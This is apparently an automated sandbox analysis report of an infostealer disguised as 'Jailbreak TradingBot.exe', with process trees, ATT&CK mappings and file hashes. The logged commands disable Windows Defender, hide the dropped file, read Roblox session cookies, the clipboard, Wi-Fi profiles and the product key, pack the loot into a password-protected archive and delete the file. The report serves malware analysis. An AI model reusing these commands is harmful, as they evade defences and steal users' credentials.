C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 25⤵PID:2436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:5056
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:3860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:3752
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe""4⤵
- Hide Artifacts: Hidden Files and Directories
PID:3664 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe"5⤵
- Views/modifies file attributes
PID:1536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:2080
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:2712
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:5140
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:5904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
PID:3968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:2976
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5788
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3312 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:4652
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:5372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:5812
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:5500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5404
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:5864
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2220
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:5296
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:1932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:3492
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5664
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:6120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5160
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:6092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:416
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:3244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:4536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:3372
-
C:\Windows\system32\getmac.exegetmac5⤵PID:3808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI56802\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\j2WLE.zip" *"4⤵PID:5744
-
C:\Users\Admin\AppData\Local\Temp\_MEI56802\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI56802\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\j2WLE.zip" *5⤵
- Executes dropped EXE
PID:1884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:2660
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:5168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:6028
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:1868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:1408
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:432
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:5940
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:1560
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Roaming\Built.exe""4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5288 -
C:\Windows\system32\PING.EXEping localhost -n 35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3860
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵PID:1224
-
C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:372 -
C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"2⤵
- Executes dropped EXE
PID:5652
-
-
C:\Users\Admin\AppData\Roaming\Built.exe"C:\Users\Admin\AppData\Roaming\Built.exe"2⤵
- Executes dropped EXE
PID:5512 -
C:\Users\Admin\AppData\Roaming\Built.exe"C:\Users\Admin\AppData\Roaming\Built.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
PID:1876 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'"4⤵PID:4692
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵PID:5992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
PID:2168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:408
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:2660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5312
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:5864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"4⤵PID:4140
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 25⤵PID:5012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"4⤵PID:5228
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 25⤵PID:5104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:5560
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:5736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:4392
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:3688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe""4⤵
- Hide Artifacts: Hidden Files and Directories
PID:3632 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe"5⤵
- Views/modifies file attributes
PID:768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5224
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:6024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:4592
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:1472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:5844
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:3164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
PID:1684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
PID:5284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:3680
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:4320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:3488
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1288 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:1252
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:5872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:2720
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:2128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:4468
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5600
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:5780
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:6096
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:6028
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:1964
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5904
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:656
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:5492
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
PID:3768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:2152
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:5616
-
C:\Windows\system32\getmac.exegetmac5⤵PID:2792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI55122\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\8yjmo.zip" *"4⤵PID:1460
-
C:\Users\Admin\AppData\Local\Temp\_MEI55122\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI55122\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\8yjmo.zip" *5⤵
- Executes dropped EXE
PID:5156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:3488
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:5380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:4084
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:5500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5788
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:3588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:1076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
PID:4040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:6068
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:5608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:4892
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:3960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Roaming\Built.exe""4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5264 -
C:\Windows\system32\PING.EXEping localhost -n 35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2780
-
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵PID:4988
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵
- Executes dropped EXE
PID:2260
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
152B
MD5d7114a6cd851f9bf56cf771c37d664a2
SHA1769c5d04fd83e583f15ab1ef659de8f883ecab8a
SHA256d2c75c7d68c474d4b8847b4ba6cfd09fe90717f46dd398c86483d825a66e977e
SHA51233bdae2305ae98e7c0de576de5a6600bd70a425e7b891d745cba9de992036df1b3d1df9572edb0f89f320e50962d06532dae9491985b6b57fd37d5f46f7a2ff8
-
Filesize
152B
MD5719923124ee00fb57378e0ebcbe894f7
SHA1cc356a7d27b8b27dc33f21bd4990f286ee13a9f9
SHA256aa22ab845fa08c786bd3366ec39f733d5be80e9ac933ed115ff048ff30090808
SHA512a207b6646500d0d504cf70ee10f57948e58dab7f214ad2e7c4af0e7ca23ce1d37c8c745873137e6c55bdcf0f527031a66d9cc54805a0eac3678be6dd497a5bbc
-
Filesize
5KB
MD5d6d5ed7bb6b7d3b882f394c4300b6422
SHA1cbaae92850b0423c07b177eb090d4188933c8657
SHA2561b87e416d590a8a65286c1bf5e9f757a38706d10b031dd1fd3c5a7e06c2582e4
SHA512997e3bc4f3958c929028d0c6250f165a3ec66dff69d550c599b39e470a47d60feeb85790914ddd15f95ce9e6c902aa63df37412c88f8918df8ecd956f82dc7a2
-
Filesize
6KB
MD5b7b327c9754e8a3b604112a719a98e81
SHA1767426eb0d87952b3fa418d5db9e806c643226a5
SHA25606de26737cac2634f178f17451255c31e41ffe36dadd1125c0fa96a74a168f10
SHA51210e72fc5f4250b0c36f21808124bf39dfc37fad5e35793ce56f67764ce06c4124ec40eff43f3e462a2d1beff4c0b6ec712a614b514129c367920c3501f465335
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD546b9423e4071cd13503619e698685358
SHA14baa0f2ab762a2a9e8264f376f7ef1ab274acb93
SHA2562be07ecd7aad78418efbc9836749c74faf1428230aa38f1e9113c47563372347
SHA512080e24f2411f11bc38650ef3f6c73e8d9c80ca2d524bab54b71d071330668a2cf79e09ab53ddcec57653d9569a3987d38a11a1288be215441b6634e3758f0589
-
Filesize
11KB
MD5b9be8f3a8c0444869e744a0f238bfd3d
SHA1af441a3cfdf01e882336c6495faa100b8f8eb1ee
SHA256072ff6975789afb3003e537a1bd6066de470d1721aa30784d3ba90c8efb41cc2
SHA5126e23b1a2025fd9056679cef6e0c55808c6932c52f898679939baedb3a8a84507fff9b50868d1cbd444b7d4dd7ade9b0d76dc90449151eecd2e0109b95c73fa9c
-
Filesize
114KB
MD5f0b6304b7b1d85d077205e5df561164a
SHA1186d8f4596689a9a614cf47fc85f90f0b8704ffe
SHA256c3aa800492bc1e5ff4717db8c82d1f3772b24579cde51058bdd73a9cc9822dc7
SHA512d672ea182ddf56a331d3209dcf7b9af8c3ffad0b787b224fe9e3e4c80205e474a66914358fa253c170c85a8366da2f2c3aa9d42e1f6f3291a9e6bdd9ba51fb0a
-
Filesize
124KB
MD5cb7ae7e8196e8b577597b52aed5b7081
SHA13027fdf01f54ca5a5ea37be5e424a62afa6c242c
SHA256d81da6a8dcd731de8ccaa9d034162cf210f32c685459d4a98919dc9e67c4a0d9
SHA5124eb0c0a9bec465e60eceeeb975b58cb2b82e4ecc809fe79eb60c0e96f304ea291f279db8fef185e9fdd8951629d6f704e5dbc6a16d3b3414376fece568768242
-
Filesize
20KB
MD5a603e09d617fea7517059b4924b1df93
SHA131d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
160KB
MD5f310cf1ff562ae14449e0167a3e1fe46
SHA185c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA5121196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad
-
Filesize
106KB
MD5870fea4e961e2fbd00110d3783e529be
SHA1a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA25676fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA5120b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88
-
Filesize
46KB
MD5db5ec505d7c19345ca85d896c4bd7ef4
SHA1c459bb6750937fbdc8ca078a74fd3d1e8461b11c
SHA256d3fb8bad482505eb4069fa2f2bb79e73f369a4181b7acc7abe9035ecbd39cec9
SHA5120d9fdb9054e397bc9035301e08532dc20717ec73ad27cf7134792a859ca234ab0cd4afa77d6cb2db8c35b7b0bccf49935630b3fe1bd0a83a9be228b9c3d8c629
-
Filesize
56KB
MD526e65481188fe885404f327152b67c5e
SHA16cd74c25cc96fb61fc92a70bdfbbd4a36fda0e3d
SHA256b76b63e8163b2c2b16e377114d41777041fcc948806d61cb3708db85cca57786
SHA5125b58fc45efebc30f26760d22f5fe74084515f1f3052b34b0f2d1b825f0d6a2614e4edaf0ce430118e6aaaf4bb8fcc540699548037f99a75dd6e53f9816068857
-
Filesize
104KB
MD5072e08b39c18b779446032bf2104247b
SHA1a7ddad40ef3f0472e3c9d8a9741bd97d4132086c
